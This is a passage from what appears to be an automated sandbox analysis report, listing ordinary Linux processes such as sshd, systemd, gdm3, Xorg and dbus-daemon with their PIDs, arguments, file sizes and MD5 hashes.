                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: sshd PID: 5272 Parent PID: 1

                            General

                            Start time:04:15:53
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -D
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            File Activities

                            Analysis Process: systemd PID: 5285 Parent PID: 1

                            General

                            Start time:04:16:16
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: systemd-resolved PID: 5285 Parent PID: 1

                            General

                            Start time:04:16:16
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-resolved
                            Arguments:/lib/systemd/systemd-resolved
                            File size:415968 bytes
                            MD5 hash:c93bbc5e20248114c56896451eab7a8b

                            File Activities

                            Analysis Process: systemd PID: 5572 Parent PID: 1

                            General

                            Start time:04:16:25
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: systemd-logind PID: 5572 Parent PID: 1

                            General

                            Start time:04:16:25
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-logind
                            Arguments:/lib/systemd/systemd-logind
                            File size:268576 bytes
                            MD5 hash:8dd58a1b4c12f7a1d5fe3ce18b2aaeef

                            File Activities

                            Analysis Process: systemd PID: 5709 Parent PID: 1

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: accounts-daemon PID: 5709 Parent PID: 1

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:/usr/lib/accountsservice/accounts-daemon
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            File Activities

                            Analysis Process: accounts-daemon PID: 5724 Parent PID: 5709

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:n/a
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            File Activities

                            Analysis Process: language-validate PID: 5724 Parent PID: 5709

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:/usr/share/language-tools/language-validate en_US.UTF-8
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: language-validate PID: 5725 Parent PID: 5724

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: language-options PID: 5725 Parent PID: 5724

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:/usr/share/language-tools/language-options
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            File Activities

                            Analysis Process: language-options PID: 5726 Parent PID: 5725

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:n/a
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            Analysis Process: sh PID: 5726 Parent PID: 5725

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:sh -c "locale -a | grep -F .utf8 "
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: sh PID: 5727 Parent PID: 5726

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: locale PID: 5727 Parent PID: 5726

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/bin/locale
                            Arguments:locale -a
                            File size:58944 bytes
                            MD5 hash:c72a78792469db86d91369c9057f20d2

                            File Activities

                            Analysis Process: sh PID: 5728 Parent PID: 5726

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: grep PID: 5728 Parent PID: 5726

                            General

                            Start time:04:16:28
                            Start date:01/11/2021
                            Path:/usr/bin/grep
                            Arguments:grep -F .utf8
                            File size:199136 bytes
                            MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                            File Activities

                            Analysis Process: xfce4-session PID: 5712 Parent PID: 1900

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/xfce4-session
                            Arguments:n/a
                            File size:264752 bytes
                            MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                            Analysis Process: rm PID: 5712 Parent PID: 1900

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/rm
                            Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                            File Activities

                            Analysis Process: systemd PID: 5713 Parent PID: 1860

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: pulseaudio PID: 5713 Parent PID: 1860

                            General

                            Start time:04:16:26
                            Start date:01/11/2021
                            Path:/usr/bin/pulseaudio
                            Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                            File size:100832 bytes
                            MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                            File Activities

                            Analysis Process: gdm-session-worker PID: 5719 Parent PID: 1809

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:n/a
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            Analysis Process: Default PID: 5719 Parent PID: 1809

                            General

                            Start time:04:16:27
                            Start date:01/11/2021
                            Path:/etc/gdm3/PostSession/Default
                            Arguments:/etc/gdm3/PostSession/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: gdm3 PID: 5731 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: gdm-session-worker PID: 5731 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:"gdm-session-worker [pam/gdm-launch-environment]"
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            File Activities

                            Analysis Process: gdm-session-worker PID: 5738 Parent PID: 5731

                            General

                            Start time:04:16:32
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:n/a
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            Analysis Process: gdm-x-session PID: 5738 Parent PID: 5731

                            General

                            Start time:04:16:32
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:/usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: gdm-x-session PID: 5742 Parent PID: 5738

                            General

                            Start time:04:16:33
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:n/a
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: Xorg PID: 5742 Parent PID: 5738

                            General

                            Start time:04:16:33
                            Start date:01/11/2021
                            Path:/usr/bin/Xorg
                            Arguments:/usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: Xorg.wrap PID: 5742 Parent PID: 5738

                            General

                            Start time:04:16:33
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg.wrap
                            Arguments:/usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:14488 bytes
                            MD5 hash:48993830888200ecf19dd7def0884dfd

                            File Activities

                            Analysis Process: Xorg PID: 5742 Parent PID: 5738

                            General

                            Start time:04:16:33
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg
                            Arguments:/usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:2448840 bytes
                            MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                            File Activities

                            Analysis Process: Xorg PID: 5773 Parent PID: 5742

                            General

                            Start time:04:16:41
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg
                            Arguments:n/a
                            File size:2448840 bytes
                            MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                            Analysis Process: sh PID: 5773 Parent PID: 5742

                            General

                            Start time:04:16:41
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: sh PID: 5774 Parent PID: 5773

                            General

                            Start time:04:16:41
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: xkbcomp PID: 5774 Parent PID: 5773

                            General

                            Start time:04:16:41
                            Start date:01/11/2021
                            Path:/usr/bin/xkbcomp
                            Arguments:/usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
                            File size:217184 bytes
                            MD5 hash:c5f953aec4c00d2a1cc27acb75d62c9b

                            File Activities

                            Analysis Process: gdm-x-session PID: 5795 Parent PID: 5738

                            General

                            Start time:04:16:47
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:n/a
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: dbus-daemon PID: 5795 Parent PID: 5738

                            General

                            Start time:04:16:47
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:dbus-daemon --print-address 4 --session
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            File Activities

                            Analysis Process: dbus-daemon PID: 5797 Parent PID: 5795

                            General

                            Start time:04:16:47
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:n/a
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            Analysis Process: dbus-daemon PID: 5798 Parent PID: 5797

                            General

                            Start time:04:16:47
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:n/a
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            File Activities

                            Analysis Process: false PID: 5798 Parent PID: 5797

                            General

                            Start time:04:16:47
                            Start date:01/11/2021
                            Path:/bin/false
                            Arguments:/bin/false
                            File size:39256 bytes
                            MD5 hash:3177546c74e4f0062909eae43d948bfc

                            File Activities

                            Analysis Process: gdm3 PID: 5732 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 5732 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/etc/gdm3/PrimeOff/Default
                            Arguments:/etc/gdm3/PrimeOff/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: gdm3 PID: 5733 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 5733 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/etc/gdm3/PrimeOff/Default
                            Arguments:/etc/gdm3/PrimeOff/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: gdm3 PID: 5736 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 5736 Parent PID: 1320

                            General

                            Start time:04:16:30
                            Start date:01/11/2021
                            Path:/etc/gdm3/PrimeOff/Default
                            Arguments:/etc/gdm3/PrimeOff/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: gdm3 PID: 5801 Parent PID: 1320

                            General

                            Start time:04:16:48
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 5801 Parent PID: 1320

                            General

                            Start time:04:16:48
                            Start date:01/11/2021
                            Path:/etc/gdm3/PrimeOff/Default
                            Arguments:/etc/gdm3/PrimeOff/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: gdm3 PID: 5802 Parent PID: 1320

                            General

                            Start time:04:16:48
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 5802 Parent PID: 1320

                            General

                            Start time:04:16:48
                            Start date:01/11/2021
                            Path:/etc/gdm3/PrimeOff/Default
                            Arguments:/etc/gdm3/PrimeOff/Default
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: systemd PID: 5854 Parent PID: 1

                            General

                            Start time:04:17:49
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: sshd PID: 5854 Parent PID: 1

                            General

                            Start time:04:17:49
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -t
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            File Activities

                            Analysis Process: systemd PID: 5855 Parent PID: 1

                            General

                            Start time:04:17:49
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: sshd PID: 5855 Parent PID: 1

                            General

                            Start time:04:17:49
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -D
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            File Activities

                            Analysis Process: systemd PID: 5858 Parent PID: 1

                            General

                            Start time:04:17:50
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: systemd-resolved PID: 5858 Parent PID: 1

                            General

                            Start time:04:17:50
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-resolved
                            Arguments:/lib/systemd/systemd-resolved
                            File size:415968 bytes
                            MD5 hash:c93bbc5e20248114c56896451eab7a8b

                            File Activities

                            Analysis Process: systemd PID: 6122 Parent PID: 1

                            General

                            Start time:04:17:51
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: systemd-logind PID: 6122 Parent PID: 1

                            General

                            Start time:04:17:51
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd-logind
                            Arguments:/lib/systemd/systemd-logind
                            File size:268576 bytes
                            MD5 hash:8dd58a1b4c12f7a1d5fe3ce18b2aaeef

                            File Activities

                            Analysis Process: gdm3 PID: 6239 Parent PID: 1320

                            General

                            Start time:04:17:51
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: gdm-session-worker PID: 6239 Parent PID: 1320

                            General

                            Start time:04:17:51
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:"gdm-session-worker [pam/gdm-launch-environment]"
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            File Activities

                            Analysis Process: gdm-session-worker PID: 6256 Parent PID: 6239

                            General

                            Start time:04:17:55
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-session-worker
                            Arguments:n/a
                            File size:293360 bytes
                            MD5 hash:692243754bd9f38fe9bd7e230b5c060a

                            Analysis Process: gdm-x-session PID: 6256 Parent PID: 6239

                            General

                            Start time:04:17:55
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:/usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: gdm-x-session PID: 6258 Parent PID: 6256

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:n/a
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: Xorg PID: 6258 Parent PID: 6256

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/usr/bin/Xorg
                            Arguments:/usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: Xorg.wrap PID: 6258 Parent PID: 6256

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg.wrap
                            Arguments:/usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:14488 bytes
                            MD5 hash:48993830888200ecf19dd7def0884dfd

                            File Activities

                            Analysis Process: Xorg PID: 6258 Parent PID: 6256

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg
                            Arguments:/usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
                            File size:2448840 bytes
                            MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                            File Activities

                            Analysis Process: Xorg PID: 6278 Parent PID: 6258

                            General

                            Start time:04:18:10
                            Start date:01/11/2021
                            Path:/usr/lib/xorg/Xorg
                            Arguments:n/a
                            File size:2448840 bytes
                            MD5 hash:730cf4c45a7ee8bea88abf165463b7f8

                            Analysis Process: sh PID: 6278 Parent PID: 6258

                            General

                            Start time:04:18:10
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: sh PID: 6279 Parent PID: 6278

                            General

                            Start time:04:18:10
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: xkbcomp PID: 6279 Parent PID: 6278

                            General

                            Start time:04:18:10
                            Start date:01/11/2021
                            Path:/usr/bin/xkbcomp
                            Arguments:/usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
                            File size:217184 bytes
                            MD5 hash:c5f953aec4c00d2a1cc27acb75d62c9b

                            File Activities

                            Analysis Process: gdm-x-session PID: 6283 Parent PID: 6256

                            General

                            Start time:04:18:15
                            Start date:01/11/2021
                            Path:/usr/lib/gdm3/gdm-x-session
                            Arguments:n/a
                            File size:96944 bytes
                            MD5 hash:498a824333f1c1ec7767f4612d1887cc

                            File Activities

                            Analysis Process: dbus-daemon PID: 6283 Parent PID: 6256

                            General

                            Start time:04:18:15
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:dbus-daemon --print-address 4 --session
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            File Activities

                            Analysis Process: dbus-daemon PID: 6285 Parent PID: 6283

                            General

                            Start time:04:18:16
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:n/a
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            Analysis Process: dbus-daemon PID: 6286 Parent PID: 6285

                            General

                            Start time:04:18:16
                            Start date:01/11/2021
                            Path:/usr/bin/dbus-daemon
                            Arguments:n/a
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            File Activities

                            Analysis Process: false PID: 6286 Parent PID: 6285

                            General

                            Start time:04:18:16
                            Start date:01/11/2021
                            Path:/bin/false
                            Arguments:/bin/false
                            File size:39256 bytes
                            MD5 hash:3177546c74e4f0062909eae43d948bfc

                            File Activities

                            Analysis Process: systemd PID: 6242 Parent PID: 1

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: accounts-daemon PID: 6242 Parent PID: 1

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:/usr/lib/accountsservice/accounts-daemon
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            File Activities

                            Analysis Process: accounts-daemon PID: 6246 Parent PID: 6242

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/lib/accountsservice/accounts-daemon
                            Arguments:n/a
                            File size:203192 bytes
                            MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                            File Activities

                            Analysis Process: language-validate PID: 6246 Parent PID: 6242

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:/usr/share/language-tools/language-validate en_US.UTF-8
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: language-validate PID: 6247 Parent PID: 6246

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-validate
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: language-options PID: 6247 Parent PID: 6246

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:/usr/share/language-tools/language-options
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            File Activities

                            Analysis Process: language-options PID: 6248 Parent PID: 6247

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/share/language-tools/language-options
                            Arguments:n/a
                            File size:3478464 bytes
                            MD5 hash:16a21f464119ea7fad1d3660de963637

                            Analysis Process: sh PID: 6248 Parent PID: 6247

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:sh -c "locale -a | grep -F .utf8 "
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            File Activities

                            Analysis Process: sh PID: 6251 Parent PID: 6248

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: locale PID: 6251 Parent PID: 6248

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/bin/locale
                            Arguments:locale -a
                            File size:58944 bytes
                            MD5 hash:c72a78792469db86d91369c9057f20d2

                            File Activities

                            Analysis Process: sh PID: 6252 Parent PID: 6248

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/bin/sh
                            Arguments:n/a
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Analysis Process: grep PID: 6252 Parent PID: 6248

                            General

                            Start time:04:17:52
                            Start date:01/11/2021
                            Path:/usr/bin/grep
                            Arguments:grep -F .utf8
                            File size:199136 bytes
                            MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                            File Activities

                            Analysis Process: systemd PID: 6254 Parent PID: 1

                            General

                            Start time:04:17:55
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: systemd PID: 6254 Parent PID: 1

                            General

                            Start time:04:17:55
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd
                            Arguments:/lib/systemd/systemd --user
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            File Activities

                            Analysis Process: systemd PID: 6259 Parent PID: 6254

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            File Activities

                            Analysis Process: systemd PID: 6260 Parent PID: 6259

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: 30-systemd-environment-d-generator PID: 6260 Parent PID: 6259

                            General

                            Start time:04:17:56
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
                            Arguments:/usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
                            File size:14480 bytes
                            MD5 hash:42417da8051ba8ee0eea7854c62d99ca

                            File Activities

                            Analysis Process: systemd PID: 6265 Parent PID: 6254

                            General

                            Start time:04:18:02
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            File Activities

                            Analysis Process: systemctl PID: 6265 Parent PID: 6254

                            General

                            Start time:04:18:03
                            Start date:01/11/2021
                            Path:/bin/systemctl
                            Arguments:/bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
                            File size:996584 bytes
                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                            File Activities

                            Analysis Process: systemd PID: 6268 Parent PID: 6254

                            General

                            Start time:04:18:03
                            Start date:01/11/2021
                            Path:/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            File Activities

                            Analysis Process: pulseaudio PID: 6268 Parent PID: 6254

                            General

                            Start time:04:18:04
                            Start date:01/11/2021
                            Path:/usr/bin/pulseaudio
                            Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                            File size:100832 bytes
                            MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                            File Activities

                            Analysis Process: gdm3 PID: 6290 Parent PID: 1320

                            General

                            Start time:04:18:17
                            Start date:01/11/2021
                            Path:/usr/sbin/gdm3
                            Arguments:n/a
                            File size:453296 bytes
                            MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                            Analysis Process: Default PID: 6290 Parent PID: 1320

                            General

